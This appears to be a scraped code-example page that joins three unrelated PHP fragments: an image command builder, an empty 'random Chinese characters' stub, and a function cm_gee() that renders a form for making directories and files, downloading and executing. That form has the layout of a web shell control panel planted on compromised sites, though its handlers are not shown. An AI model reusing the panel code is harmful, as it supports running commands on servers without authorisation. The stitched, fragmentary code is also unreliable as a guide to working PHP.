function cm_gee()
{
    echo "<form method=\"POST\" action=\"" . $php . "\" >";
    echo "<table dir =right border=1 bgcolor =\"000000\" ><tr><td>MK Dir</td><td>";
    inp('text', '55', 'mKd', path, '');
    sub('mkD', '&nbsp;MKD ', $pr = '<br>');
    echo "</td></tr>";
    echo "<tr><td>MK File</td><td>";
    inp('text', '55', 'mKf', path, '');
    sub('mkF', '&nbsp;MKF ', '<br>');
    echo "</td></tr>";
    echo "<tr><td>Download</td><td>";
    inp('text', '55', 'dWn', path, '');
    sub('dWNf', 'down', '<br>');
    echo "</td></tr>";
    echo "<tr><td>File options</td><td>";
    ch();
    echo "</td></tr>";
    echo "<tr><td>Execute</td><td>";
    alias();
    echo "</td></tr>\n\n</table>";
}
Ejemplo n.º 2
0
 function fmcmd($r, $g, $b, $imgin, $imgout)
 {
     return st() . $imgin . " " . ch("R", $r) . ch("G", $g) . ch("B", $b) . fn() . $imgout;
 }
Ejemplo n.º 3
0
 /**
  * 随机中文字符,字符集utf-8
  */
 static function chinese($length, $salt = NULL)
 {
     ch('u4e00');
 }